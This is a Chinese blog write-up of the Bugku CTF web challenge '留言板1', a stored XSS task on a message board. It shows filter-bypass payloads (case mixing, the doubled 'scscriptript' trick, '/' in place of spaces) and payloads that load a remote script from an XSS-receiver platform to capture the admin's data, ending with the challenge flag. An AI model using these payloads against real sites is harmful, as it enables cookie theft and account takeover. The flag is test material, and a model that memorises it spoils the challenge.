BUGKU-WEB 留言板1
默默提升实验室 2024-08-25 17:03:02 阅读 61
题目描述
题目截图如下:
进入场景看看:
解题思路
之间写过一题类似的,所以这题应该是有什么不同的那就按照之前的思路进行测试试试提示说:需要xss平台接收flag,这个和之前说的提示一样
相关工具
xss平台:https://xssaq.com对xss的一些绕过进行学习了解
解题步骤
输入测试一下script代码:
<code><script>alert(1)</script>
发现script被过滤了
,script被替换为空。参考:str_replace()函数:将字符串中的指定字符替换为其他字符
2. 换个大小写的试试:
<code><ScRipt>ALeRt(“XSS”);</sCRipT>
<code>还是被过滤了!,大小写绕过!
使用双写试试
<scscriptript>alert('z')</scscriptript>
解释:将中间的script替换为空,剩下的结合后又是script可以成功绕过。
所以确定了过滤方式之后,找个xss平台(https://xssaq.com)测试一下:
之后测试其中的代码,始终没有反应:
极限短码(好像不行):
<code><scsCRiPtript/SrC=//uj.ci/qoe>
这个好像可以正常:
<scsCRiPtript/sRC=//uj.ci/v9o></scsCRiPtript>
然后在评论区发现,管理员说xss平台需要http模式的…
然后我找了半天没有找到这个http的平台,但是当我再次看这个平台的时候,哦豁出来又!也就是说https其实也可以,只是比较慢而已?
PS:除了会大小绕过之外,其实还会对空格进行绕过。所以需要注意我们的测试代码中没有空格或者使用·/·,来绕过对空格的限制。
得到Flag
<code>flag{ 772af954ed340063c935a60d92093504}
新知识点
XSS篇——XSS过滤绕过技巧
xss各种姿势的学习(包含绕过)和个人重要总结
对此,需要重点学习一下!
有用的话,请<code>点赞收藏评论,帮助更多的同学哦
声明
本文内容仅代表作者观点,或转载于其他网站,本站不以此文作为商业用途
如有涉及侵权,请联系本站进行删除
转载本站原创文章,请注明来源及作者。